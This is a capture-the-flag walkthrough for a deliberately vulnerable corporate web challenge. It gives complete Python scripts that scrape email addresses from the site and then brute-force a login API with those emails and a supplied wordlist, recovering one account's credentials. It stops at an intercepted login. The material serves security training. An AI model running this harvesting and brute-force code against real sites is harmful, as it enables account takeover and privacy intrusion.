image.png

If you'd like to run this Docker container locally:

docker run -d -p 5055:3000 --name websockets --restart always joshbeck2024/ctf_websockets_challenge
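If you do spin it up, the -p 5055:3000 mapping publishes the site on host port 5055, so a quick reachability check from Python looks something like this (the scripts below target the hosted instance at sem2ctf.icsi.cyber:5055; swap in localhost if you're running the container yourself):

# Quick reachability check for a locally running container
# (host port 5055 comes from the -p 5055:3000 mapping above)
import requests

print(requests.get("http://localhost:5055/index.html", timeout=5).status_code)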

For this challenge, we have a corporate website with email addresses scattered throughout it.

image.png

Here’s a script, built on requests and BeautifulSoup (pip install requests beautifulsoup4), that crawls one level deep from the index page and extracts every email address it finds.

# Import the requests library to make HTTP requests (download web pages)
import requests

# Import re for regular expressions (used to find email patterns in text)
import re

# Import BeautifulSoup for parsing and navigating HTML content
from bs4 import BeautifulSoup

# Import urljoin to safely build full URLs from relative links
from urllib.parse import urljoin

def extract_emails(text):
    """
    This function takes a block of text and extracts any email addresses
    found inside it using a regular expression.
    """

    # Regular expression pattern that matches most email addresses
    email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'

    # re.findall() returns all matches found in the text
    # set() removes duplicate email addresses
    return set(re.findall(email_pattern, text))

def scrape_emails():
    """
    This function visits a website, extracts emails from the main page,
    then follows links on that page and extracts emails from those pages too.
    """

    # The starting page we want to scrape
    base_url = "<http://sem2ctf.icsi.cyber:5055/index.html>"

    # Keep track of URLs we have already visited to avoid repeats
    visited_urls = set()

    # Store all discovered email addresses (unique values only)
    found_emails = set()

    # Create a session object for efficiency (reuses connections)
    session = requests.Session()

    print(f"I: Visiting main page: {base_url}")

    try:
        # Request the main page
        response = session.get(base_url, timeout=5)

        # Raise an exception if the request failed (404, 500, etc.)
        response.raise_for_status()

        # Parse the HTML content using BeautifulSoup
        soup = BeautifulSoup(response.text, 'html.parser')

        # Extract emails from all visible text on the main page
        found_emails.update(extract_emails(soup.get_text()))

        # List to store links found on the page
        links = []

        # Find all anchor (<a>) tags that contain an href attribute
        for a_tag in soup.find_all('a', href=True):
            href = a_tag['href']

            # Convert relative URLs into full absolute URLs
            full_url = urljoin(base_url, href)

            # Only follow valid HTTP links and avoid duplicates
            # This also skips things like mailto: or javascript: links
            if full_url.startswith('http') and full_url not in visited_urls:
                links.append(full_url)
                visited_urls.add(full_url)

        # Visit each discovered link once (one level deep)
        for link in links:
            # Avoid re-visiting the main page
            if link == base_url:
                continue

            print(f"I: Visiting link: {link}")

            try:
                # Request the linked page
                link_response = session.get(link, timeout=5)

                # Only process the page if the request was successful
                if link_response.status_code == 200:
                    link_soup = BeautifulSoup(link_response.text, 'html.parser')

                    # Extract emails from this page's text
                    found_emails.update(extract_emails(link_soup.get_text()))

            except Exception as e:
                # If a link fails (404, timeout, etc.), continue safely
                print(f"E: Failed to visit {link}: {e}")

    except Exception as e:
        # If the main page fails, stop the program
        print(f"C: Critical error accessing main page: {e}")
        return

    # Write all found email addresses to a file
    with open('email.txt', 'w') as f:
        for email in sorted(found_emails):
            f.write(email + '\n')

    print(f"S: Scraped {len(found_emails)} unique emails. Saved to email.txt")

# This ensures the script only runs when executed directly,
# not when imported as a module
if __name__ == "__main__":
    scrape_emails()
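As a quick sanity check of the regex, extract_emails() can be run on a throwaway string before pointing the script at the site (the addresses below are placeholders, not challenge data):

# Throwaway test of extract_emails(); the addresses here are made up
sample = '''
Contact sales at sales@socketcorp.local or support@socketcorp.local.
Fragments like not-an-email@ or @nowhere.example should be ignored.
'''
print(sorted(extract_emails(sample)))
# ['sales@socketcorp.local', 'support@socketcorp.local']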

A password list is provided on the front page to speed things up:

image.png
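The screenshot isn't reproduced here, but assuming the list is served as a plain-text file linked from the front page, saving it to pass.txt only takes a few lines (the /pass.txt path below is a guess; substitute whatever the page actually links to):

# Save the provided wordlist to pass.txt for the brute-force step.
# NOTE: the /pass.txt path is an assumption; use the real link from the front page.
import requests

wordlist_url = "http://sem2ctf.icsi.cyber:5055/pass.txt"
candidates = [
    line.strip()
    for line in requests.get(wordlist_url, timeout=5).text.splitlines()
    if line.strip()
]

with open("pass.txt", "w") as f:
    f.write("\n".join(candidates) + "\n")

print(f"I: Saved {len(candidates)} candidate passwords to pass.txt")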

If we intercept a single manual login attempt using Burp Suite, we’ll see:

image.png

image.png

Because we now have our email.txt and pass.txt files, we can put together a textbook brute force:

# Import requests to send HTTP requests (used to talk to the API)
import requests

def brute_force():
    """
    This function attempts to brute-force login credentials against
    a web API by trying combinations of usernames and passwords.
    """

    # The API endpoint we are attacking
    target_url = "<http://sem2ctf.icsi.cyber:5055/api/login>"

    # Load usernames (emails) from email.txt
    try:
        with open('email.txt', 'r') as f:
            # Read each line, remove whitespace, and ignore empty lines
            usernames = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        # Stop if the file does not exist
        print("E: email.txt not found.")
        return

    # Load passwords from pass.txt
    try:
        with open('pass.txt', 'r') as f:
            # Read each line, remove whitespace, and ignore empty lines
            passwords = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        # Stop if the file does not exist
        print("E: pass.txt not found.")
        return

    # Print basic info so the user knows what is happening
    print(f"I: Loaded {len(usernames)} usernames and {len(passwords)} passwords.")
    print(f"I: Target URL: {target_url}")

    # Create a session object to reuse the same connection (more efficient)
    session = requests.Session()

    # Loop through every username
    for username in usernames:
        # Loop through every password
        for password in passwords:
            # Optional debug output (commented out to reduce noise)
            # print(f"Trying {username}:{password}...", end='\\r')

            # Build the JSON payload sent to the API
            json_data = {
                'username': username,
                'password': password
            }

            try:
                # Send a POST request with JSON data
                response = session.post(
                    target_url,
                    json=json_data,
                    timeout=5
                )

                # Check for possible success
                # Many APIs return HTTP 200 on successful login
                if response.status_code == 200:
                    try:
                        # Try to parse the response as JSON
                        resp_json = response.json()

                        # Look for common success indicators
                        # - success flag
                        # - token value
                        # - the word "success" in the response
                        if (
                            resp_json.get('success') or
                            resp_json.get('token') or
                            'success' in response.text.lower()
                        ):
                            print(f"\\n[+] SUCCESS Found credentials: {username}:{password}")
                            print(f"Response: {response.text}")
                            return

                    except ValueError:
                        # If the response body is not valid JSON,
                        # fall back to checking the raw text below
                        pass

                    # Fallback check in case JSON parsing failed
                    if "success" in response.text.lower():
                        print(f"\\n[+] SUCCESS Found credentials: {username}:{password}")
                        return

            except requests.RequestException as e:
                # If the request fails (timeout, connection error, etc.),
                # skip this attempt and continue
                # print(f"\\nE: Request failed for {username}:{password} - {e}")
                continue

    # If all combinations are tried with no success
    print("\\n[-] Finished brute force. No credentials found.")

# This ensures the function only runs if the script is executed directly
if __name__ == "__main__":
    brute_force()

This will kick out john@socketcorp.local’s credentials.

image.png
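Before firing up Burp again, it's worth replaying the login once outside the browser to see the raw API response (substitute the password the brute force printed; it isn't reproduced here):

# One-off login with the recovered account to inspect the raw response.
# "REDACTED" stands in for the password reported by the brute force.
import requests

resp = requests.post(
    "http://sem2ctf.icsi.cyber:5055/api/login",
    json={"username": "john@socketcorp.local", "password": "REDACTED"},
    timeout=5,
)
print(resp.status_code)
print(resp.text)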

Now let’s intercept a login using these credentials in Burp Suite.

image.png